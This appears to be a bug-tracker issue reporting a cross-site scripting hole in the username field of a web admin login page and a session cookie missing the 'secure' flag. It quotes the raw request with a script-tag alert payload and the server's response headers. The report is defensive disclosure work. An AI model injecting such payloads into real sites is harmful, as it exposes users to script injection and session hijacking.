Open roughpatch opened 4 years ago
The username parameter is insecure, allowing for cross-site script injection, link injection, and phishing through frames from the login page:
POST /webadmin/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Referer: https://ourserver.com/webadmin/ Cookie: PHPSESSID=ra4sfb0vjui2ck2m95se7f06v0 Connection: keep-alive Host: ourserver.com Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Origin: https://ourserver.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded loginwith=adlogin&username=<script>alert(1234)</script>&password=&submit=
Additionally, the PHPSESSID cookie missing the 'secure' attribute:
HTTP/1.1 200 OK Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Content-Length: 2083 Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16 **Set-Cookie: PHPSESSID=fhbh9ljrnsddl2cu3jt1752942; path=/** Expires: Thu, 19 Nov 1981 08:52:00 GMT X-Powered-By: PHP/5.4.16 Connection: Keep-Alive Date: Mon, 09 Dec 2019 22:33:27 GMT Keep-Alive: timeout=5, max=68 Content-Type: text/html; charset=UTF-8 Pragma: no-cache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
roughpatch
commented
4 years ago 
roughpatch
commented
4 years ago
The username parameter is insecure, allowing for cross-site script injection, link injection, and phishing through frames from the login page:
Additionally, the PHPSESSID cookie missing the 'secure' attribute: